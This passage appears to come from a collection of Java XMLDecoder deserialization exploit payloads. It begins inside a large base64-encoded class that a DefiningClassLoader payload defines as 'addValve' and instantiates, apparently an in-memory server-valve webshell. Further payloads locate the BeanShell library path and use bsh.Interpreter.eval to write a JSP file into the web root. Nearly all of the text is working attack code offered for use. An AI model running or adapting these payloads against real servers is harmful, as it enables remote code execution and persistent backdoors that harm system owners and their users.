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</string>
</void>
</void> <void class="org.mozilla.javascript.DefiningClassLoader">
<void method="defineClass">
<string>addValve</string>
<object idref="decodeStr"/>
<void method="newInstance"></void> </void>
</void>
</java>


<java>
<void class="org.mozilla.javascript.DefiningClassLoader">
<void method="loadClass" id="class">
<string>bsh.Interpreter</string>
<boolean>false</boolean>
</void>
</void>
<object idref="class">
<void method="getProtectionDomain">
    <void method="getCodeSource">
        <void method="getLocation">
            <void method="getPath">
            </void>
        </void>
    </void>
</void>
</object>
</java>


<java>
<void class="bsh.Interpreter">
<void method="eval">
<string>PrintWriter bsh = new PrintWriter(Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter").getProtectionDomain().getCodeSource().getLocation().getPath().split("bsh")[0] + "hrs.jsp");bsh.write("123123");bsh.close();</string>
</void>
</void>
</java>
*/